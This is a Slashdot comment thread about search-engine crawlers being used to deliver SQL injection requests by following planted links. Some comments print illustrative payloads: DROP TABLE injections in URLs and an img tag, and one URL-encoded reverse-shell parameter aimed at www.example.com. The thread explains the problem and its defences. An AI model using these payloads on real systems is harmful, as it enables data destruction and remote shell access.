Google Bots Doing SQL Injection Attacks 156
ccguy writes "It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker. In this scenario, the bot was crawling Site A. Site A had a number of links embedded that had the SQLi requests to the target site, Site B. Google Bot then went about its business crawling pages and following links like a good boy, and in the process followed the links on Site A to Site B, and began to inadvertently attack Site B."
promo4promo (Score:2)
Doing a good deed for your competition by linking them from your site, hmm? :)
How about Yahoo "bots", Bing "bots" ? (Score:5, Insightful)
TFA seems to place all the faults on Google.
Fact is, Google is not the only one who is crawling the Net. Yahoo does it as well as Bing, among others.
If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.
Re:How about Yahoo "bots", Bing "bots" ? (Score:5, Insightful)
Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!
Next you'll be suggesting that you could do that transparently to the user and have their browser re-use their already logged in session on another site to do things with their credentials for you!!!!
What will they think of next? It's a good thing we have these wonderful stories to explain how this whole web thingy works with all it's links and stuff...
Re:How about Yahoo "bots", Bing "bots" ? (Score:4, Informative)
Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!
Real people don't have to click that link. Their computers and devices have web browsers that follow links ahead of time to
improve browsing experience. Chrome calls this "Predict network actions to improve page load performance".
But such hits would come from a wide variety of IPs, not from Google.
Re:How about Yahoo "bots", Bing "bots" ? (Score:4, Informative)
No need to use links, either.
Good old <img src="http://your.site.is/dumb?and=has+sql+injection%22;drop table users;--"/> would work just by visiting the site, as would an iframe, whether browser tries to be smart or not.
Re: (Score:2)
Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!
Why not just include an iframe, and have an onload javascript of the parent page navigate the iframe to various links?
Re: (Score:2)
Exactly. That's the sort of thing I mean by "transparently to the user". Sorry if my sarcasm was too obscure.
Re: (Score:1)
I scrolled a couple of pages down, but didn't see any SQL injection attack links. WHAT IS WRONG WITH YOU SLASHDOT?!
Re: (Score:3)
Why, it's not just bots! If you put a link out on a public web site, real people might even click on the link for you!
This is actually very useful for more persistent attacks.
Re: (Score:2)
If they know what URL is being called to cause the problem, Site B might be able to figure out Site A from logs for the client's that include the Refer in their request for it, but once they've identified the URL itself, they can just fix the actual vulnerability or block that specific URL with a redirect or something similar.
Once I found a major party's official state website allowed anyone to post and execute arbitrary PHP with full access via just filling in a comment text field, I stopped being surprise
Re:How about Yahoo "bots", Bing "bots" ? (Score:5, Informative)
Re: (Score:2, Funny)
You must work for some really shit firms, cause it's a well know fact that what you're saying is bullshit.
Re: (Score:1)
Re: (Score:2)
A DDOS is by definition a distributed denial of service. If it was a deliberate attempt, it would be DDDOS.
I don't attack Microsoft but let's make sure we use terminology properly.
It wouldn't be a DDOS for a different reason: a Bing bot would not qualify as distributed.
Re: (Score:2)
No, a DoS is a Denial Of Service. DDoS is a Distributed Denial of Service.
Re: (Score:3)
Actually, bingbot is particularly stupid. It has downloaded several zip files of public domain material (each exceeding 1GB with total over 10GB) from our web site at home. It does so about once per month despite the fact that these files are unchanging, instead of merely doing a conditional GET and checking for a 304 return [w3.org]. The various googlebots all do it this way, as do other bots (e.g. docomo, yahoo, yandex).
We don't yet bar bingbot, but if it starts dowloading several GB at times when other visitor
Re: (Score:2)
Actually, bingbot is particularly stupid. It has downloaded several zip files of public domain material (each exceeding 1GB with total over 10GB) from our web site at home. It does so about once per month despite the fact that these files are unchanging, instead of merely doing a conditional GET and checking for a 304 return [w3.org]. The various googlebots all do it this way, as do other bots (e.g. docomo, yahoo, yandex).
We don't yet bar bingbot, but if it starts dowloading several GB at times when other visitors are looking at videos (mostly 720p and 1080p), it will find itself in the wrong part of robots.txt. If I get really irritated, then it will get customized garbage results, just like the ZmEu crap...
And you can't just exclude the problem files instead of blocking the whole site?
Well, yes I could, obviously enough. But then the googlebot and other bots would be handicapped (I expect a change to at least two of those PD zipfiles during 2014). In summary, bingbot does it wrong while other bots do it right. These PD zipfiles are the most egregious examples, but there are also many smaller files where bingbot does it wrongly. So I'm likelier to bar bingbot than to bar other bots or to exclude these specific files.
As I said, bingbot is earnestly hoping for a customized middle finger
Re: (Score:2)
Interesting, since Yahoo in my locale uses Google. No Microsoft technology in sight.
Re: (Score:2)
Actually, now that you mention it, I can't find any yahoo bots in recent log files. Perhaps yahoo is also responsible for some of those stupid multi-gigabyte downloads as bingbot.
Re: (Score:2)
Why exactly should he go to the ridiculous lengths of explicitly blocking individual items when he can instead wholesale block what is clearly a hostile bot from a search engine nobody uses?
Re: (Score:2)
Look, Steve, I get that you want to push Bing as a viable search engine, but I think you'll find the only place anyone sees the name "Bing" associated with Internet searching is in movies and American dramas.
Re: (Score:2)
TFA seems to place all the faults on Google.
Fact is, Google is not the only one who is crawling the Net. Yahoo does it as well as Bing, among others.
If the Google "bots" can be tricked into doing the "heavy lifting", so can the Yahoo "bots", Bing "bots", and "bots" from other search engines.
Do not forget the NSA bots. The Chinese NSA equiv bots.
The French NSA equiv bots....
The FBI bots....
Re: (Score:1)
Lets see - they impose ZERO load?
Heres an example of a major one that doesn't.
Bing doesn't rate limit.
Bing doesn't obey robots.txt
http://www.computersolutions.cn/blog/2012/05/msn-bing-crawler-spider-madness/
They still pull the same shit even now, so fuck bing.
could not care less (Score:5, Informative)
not just "could care less". Sheeesh.
Re:could not care less (Score:5, Funny)
Means the same thing irregardless.
Re: (Score:1)
Means the same thing irregardless.
I see what you did there.
Re: (Score:1)
Means the same thing irregardless.
Do you mean literally the same, or actually the same?
Re: (Score:1)
Wouldn't be at all surprised if they do care just a little bit. making the orginal correct and your's not.
Re:could not care less (Score:5, Interesting)
It's probably laziness, but it could also be a shortened version of "I could care less, but I'd have to try."
"Sure as hell" and "sure as shit" have no meaning either, right? How sure is hell, or shit? Those are shortened versions of "as sure as hell is hot" and "as sure as shit stinks". Language happens.
I'm more concerned with errors on non-idiomatic speech, like "should of" and "could of" instead of "should have" and "could have", "try and" instead of "try to", and #1 on my list, "literally" meaning "figuratively".
After we sort that out, we can come to an agreement on split infinitives, the Harvard comma, and people whether punctuation that isn't part of a quote should be inside quotation marks or out. :-)
Re: (Score:3)
In a similar case I actually had a supplier put a line on a quote that translates to: "all products are available from stock if another date is mentioned in the line". What they meant was: "all pr
Re:could not care less (Score:4, Informative)
I'm more concerned with errors on non-idiomatic speech, like "should of" and "could of" instead of "should have" and "could have"
THIS, a thousand times this!
I'm not much of a grammar nazi, as I view communication to be the primarry purpose of text and not syntax... but "should of" actively takes chunks out of my brain every time I read it. It honestly makes me feel like I'm trying to talk to a retard, it just makes so little sense.
The worst part is, while currently it's almost exclusively native English speakers who make this mistake (which is pretty odd), soon enough people like me who learnt by practice are going to start using it en masse, and then it'll be here to stay (like "could care less" - another one perpetuated by native speakers, btw).
Re: (Score:1)
Re: (Score:2)
Let's see if we can't nip these in the bud.
a more elegant solution? (Score:2)
I agree, "should of" must be avoided at all cost. He coulda used "shoulda" instead of "should of", it's a much more elegant solution.
And before anyone gets started, yes, the damn punctuation should go outside the quotation marks, because that's where logic (not to mention everyone outside of America) requires it to be! Deal with it.
Re: (Score:2)
I don't so much mind the ones that mark the writer as an idiot* so much as the ones that change the meaning of what the idiot was trying to convey. "Writing in Python will make you loose your mind." Well, isn't setting your mind free a GOOD thing?
I have to laugh at a post that tries to be erudite by using "whom" (usually incorrectly) but doesn't know the difference between there, their, and they're. Those kinds of aliteracies really slow my reading down.
As to being native speakers, I corrected a fellow here
Re: (Score:2)
I have to laugh at a post that tries to be erudite by using "whom" (usually incorrectly) but doesn't know the difference between there, their, and they're. Those kinds of aliteracies really slow my reading down.
Yes, those are probably even worse... It makes me wonder how they were taught to write English. Nowadays you almost semi-automatically pick up on English just by hanging on the Internet a lot of the time, even if you've never met a native English speaker. One would expect grammar to be improved by it as well, but apparently not...
By the way, I learned two new words from your post, thanks :)
Re: (Score:2)
I love using the word "aliterate", people think it's a misspelling.
Re: (Score:2)
"Sure as hell" and "sure as shit" have no meaning either, right?
Well that's the point. Because they are totally meaningless as they stand, you know to look elsewhere to find the meaning. But omitting a "not" does not make "could care less" meaningless. It means something very definite, and the exact opposite of what is intended.
The idea that it's a shortened version doesn't stand up. It simply isn't said that way with the required intonation or timing. People say it because the phrase has become a meaningless, something said without any thought to what it breaks d
Re: (Score:1)
Re: (Score:2)
Actually, since they are there already, crawling it, they really could care less. They could not be there at all, but no. They do care, and are crawling.
So it was correct to say they could care less.
Well, the quote says 'could care less about your site'. I doubt google care one iota about most individual sites in isolation. They care a great deal about the web in general to be sure, but if they cared about your site, they'd send a person to look at it rather than an automated crawler.
Re: (Score:2)
Yeah, right. Sure it is.
Uhh... (Score:5, Insightful)
If you have http GET requests going (effectively) straight into your database, that's YOUR problem, not Google's.
Re: (Score:3, Informative)
I whole heartedly agree. Database programming 101: you cannot trust any inputs (user or otherwise). You must assume that any input is malicious and sanitize it as such. Maybe the devs that are researching/complaining about this should consider the target as the problem not the 12,000 different ways to input malicious code.
Re: (Score:1)
Re: (Score:2, Insightful)
Suppose there is a way to mitigate this issue on Google's end, is there something wrong with taking action to reduce the amount of attacks, even if the website is at fault?
Yes, there is something "wrong"- Google has no idea what is or is not a "malformed" request. You're basically asking Google to sanitize the database input, which is generally not possible if you don't know anything about what the database should or should not accept. adding something along the lines of 'user=root' or 'page=somekindofdata' to a query may be perfectly legitimate for one site, and a massive problem for a different one.
Re: (Score:1)
Re: (Score:1)
Not even that. For many text field, e.g. the Slashdot comment field, SQL statements can be a completely valid input. I coult be explaining to someone how to solve a problem in SQL, or I could be re-posting a "Little Bobby Tables" joke. All very valid, nothing malicious.
Seeing SQL input (or Javascript, same problem) as malicious results in people writing filters that prevent posting answers to SQL (or Javascript) related questions. Seeing it
Re: (Score:2)
I'd say it depends on the page's content. I really can't think of a valid reason for SQL statements or Javascript snippets in pages dealing about celebrity A or pet B or most other fields of interest outside of IT.
Re: (Score:1)
Re: (Score:2)
The keyword there was "effectively straight".
There is nothing wrong with having params like that. As long as you escape them properly and have input validation.
"Effectively straight" in this case means this would work: http://stocksite.com/charts.lol?symbol=GOOG&range=30 [stocksite.com]; DROP TABLE stocks --
Which is a taboo.
Re:Uhh... (Score:5, Informative)
Friends don't let friends generate dynamic SQL. Please use prepared statements!
How is that news? (Score:2)
HTTP RFC - Section 9.1 Safe and Idempotent Methods (Score:5, Informative)
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".
Re:HTTP RFC - Section 9.1 Safe and Idempotent Meth (Score:5, Funny)
Re:HTTP RFC - Section 9.1 Safe and Idempotent Meth (Score:5, Interesting)
This is Slashdot. What do we know about GET HEAD methods?
I was going to say that they return Futurama quotes but then I checked and they are gone. When did that happen?
Re: (Score:3)
TFA isn't newsworthy in my opinion, this has been known for a while now.
Re: (Score:3)
The problem with this line of thinking is that spiders are only supposed to crawl links. If you use a live link without authentication, shame on you. If you use a query to a db for something like a parts catalog that's capable of r/w, then shame on you. If you tether your logic through a pipe, the pipe needs parser constraints on the query.
Blaming Google or any other crawler-spider-bot, despite my other distain for Google, is pointing the finger at the wrong culprit. Everyone wants sub-second response times
Re: (Score:3)
As for the back-end countermeasures you described, you are of course spot on, however it's safe to assume that if you're vulnerable to something as trivial and mundane as SQL injection, you won't have the required foresight to setup and use different DB roles, each with the absolutely least privs
Re: (Score:2)
Yes, we agree; it's the problem with blaming Google, and affirmation of the sillyness. In my mind, which didn't get presented, and I apologize, is that query code has become awful, let-me-count-the-ways.
Further, when I'm forced, to, looking at page code makes me reel with revelation of the mindset of cut-and-paste APIs glued with mucilage (if it's that good). Everyone else now is to blame, not the moshpit of ducttaped code. Sorry, bad rant on a bad day.
Re: (Score:3)
If you want more performance, you should be using prepared statements and statement caching, not string concatenation to construct your queries.
Then you don't need to waste CPU time and memory escaping input data.
Re: (Score:2)
so by appending your own SQL query (say, a DELETE one) via a vulnerable input you can still do plenty of damage, even via a GET method.
That would be a bug in the application.
The HTTP spec doesn't let you say what could happen if there's a bug in the application. It could be designed so that all GETs are idempotent operations, but due to a bug they are not.
For all I know; if there's a bug in the application adding ?X=FOOBAR&do=%2Fbin%2Fbash%20-i%20%3E%2Fdev%2Ftcp%2Fwww.example.com%2F80%200%3C%261
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Agreed 100%. This article is blaming Google for admins who had bad site design. Doing a GET should not have done this; it's their fault for embedding bad links in their HTML that is exposed to a crawler.
Re: (Score:3)
It's not the admins of the sites embedding the links that are the problem. They're they attackers. The fault lies with the admins of the sites the links point to.
Re: (Score:3)
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe".
That's the funny thing about SQL injection attacks - it can turn a SELECT into a DELETE or UPDATE. So you may have *meant* your GET request to be a simple retrieval, but a successful attack could make it do so much more.
Which is a great segue to the obligatory xkcd comic!
http://xkcd.com/327/ [xkcd.com]
Re: (Score:2)
It's great that you and the other AC can describe programming best practices. Sounds like you've singlehanded solved the problem of bad programming. Now if you can just go back and fix up the millions of vulnerable sites, the world will be a better place.
Thank you.
Re: (Score:2)
Does it? The ajax requests slashdot uses make POST requests, not GET.
Anything handling a GET request shouldn't be using a database connection with delete, insert or update grants.
How would you know if it worked? (Score:1)
Re: (Score:2)
If your rival's site suddenly had a 99% sale on all products. :)
Re: (Score:2)
the site goes down. you can then guess it worked.
or a port opens at the target host, whatever the attack did.
as for using it for DOS, the target site doesn't even need to be faulty.
Skype too (Score:5, Interesting)
Heard this before (Score:2)
I vaguely recall an article years ago on something like TheDailyWtf where some idiot webmaster wrote a web application with links instead of buttons to perform tasks, and was confused why his site and data was getting trashed repeatedly, until he figured out it was the crawling bots.
This is nothing new: unskilled developers using the wrong methods and getting burned.
Re: (Score:2)
Lies, Damn Lies! (Score:2)
What is going on?
It seems that while Google could really care less about your site and has no real interest in hacking you, their automated bots can be used to do the heavy lifting for an attacker.
no, what's really happening is someone posted an injection url on a forum somewhere and googlebot ran across it. come on, google bot hasn't become sentient or som-SORRY THIS POST WAS A MISTAKE DISREGARD ALL INFORMATION.
reminds me of someone from irc... (Score:3)
This guy(who I won't name, you know who you are), was once writing some PHP code for some webapp. Well in app, he had some delete links and he hadn't finished the authentication code apparently, so googlebot crawled is site, followed all of the delete links and completely wiped out his database.
Of course, you can keep googlebot away from your crappy code with robots.txt too...
Read RFC 2616: Safe and Idempotent Methods .. (Score:2)
Re: (Score:2)
I don't get it. What's unsafe about "select * from catalog where id=".$_GET["id"]?
Re: (Score:2)
Re: (Score:3)
I can't tell if you're serious, so I'm going to act like you are in case you or some other reader doesn't understand the problem:
In the URL that you'd be using to hit that page, change the "id=42" or whatever you have there to "id=0 OR 1=1". Poof, your page is now reading the entire catalog in rather than the single record you wanted to. Hit that fast enough, and if that catalog is large enough, and the bad guy may have just brought your nice database server to a screaming halt as it loads up 300 million re
Re: (Score:2, Funny)
I don't get it. What's unsafe about "select * from catalog where id=".$_GET["id"]?
Dude... you forgot to encrypt your databases.... it should be
$catalogname = str_rot13('catalog'); $idname = str_rot13('id');
$id = str_replace(';', '', $id, ); ...
"select * from $catalogname where $idname=".$id
Make sure to insist that register_globals is set to On in the PHP settings for the web server.
Re: (Score:2)
Assuming you're actually serious, what happens when your page is requested with: ?id=0;%20drop%20table%20catalog;
Suddenly your query gets transformed to: select * from catalog where id=0; drop table catalog;
Re: (Score:1)
Because Little Bobby Tables. [xkcd.com]
http://your.site/dumbass.php?id=10; DROP TABLE catalog; --
Did anybody read TFA? (Score:5, Interesting)
The point is not that you can attack lousy website using GET requests. The idea is that HTTP firewalls shoud not blatlantly white-list google bots and other website crawlers in the sake of SEO optimization, because google bot will follow malicious links from other website..
So lets say you have a filter with rules that prevent common SQL injections in GET requests parameters, this is a weak security practice but can be useful to mitigate some 0-day attacks on vulnerable scripts. This protection can be by-passed IF you white-listed google bot.
You're holding it wrong (Score:1)
If you think you need "a filter with rules that prevent common SQL injections in GET requests parameters", then you're doing something wrong.
I know, I know -- protection in depth and all that. But some things are just too fucking ugly to even think of them. Ugh
Really? (Score:2)
So if you litter a page with malicious links, the attacks will look like they're coming from Google's servers.
That's kind of cool, actually.
I'd laugh my head off if Google were subsequently flagged as a malicious site. I *hate* bots.
I had that happen to me once. (Score:3, Interesting)
When I first started doing web apps, I made a basic demo of a contacts app and used links for the add, edit, and delete functions. One day I noticed all the data was gone. I figured someone had deleted it all for fun so I went in to restore from a backup and decided to look at the logs and see who it was. It was googlebot -- it had come walking through, dutifully clicking on every "delete" and "are you sure?" link until the content was gone.
(I knew about when to use GET versus POST -- it was just easier to show what was happening when you could mouse over the links and see the actions.)
technology (Score:1)
The core of the matter. (Score:2)
Re: (Score:1)
Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. And nothing of value was lost.
FTFY.
Re: (Score:2)
Someone wrote a terrible web app, it could be attacked with simple GET requests. Someone else made those requests, but it was still a terrible web app. And nothing of value was lost.
FTFY.
I do like that better. Thank you.
Poor websites (Score:1)
Could care less? (Score:2)
So they do care a bit then?
The Caring Continuum - http://incompetech.com/Images/caring.png [incompetech.com]
Don't blame Google (Score:1)
Paramaterize SQL? (Score:2)
My god, it's 2013 and where talking about SQL injection? If your not parameterizing your sql, your doing it wrong.
The correct phrase is... (Score:2)
"couldn't care less"
If you could care less it would not really be worth mentioning.
HTML verbs (Score:1)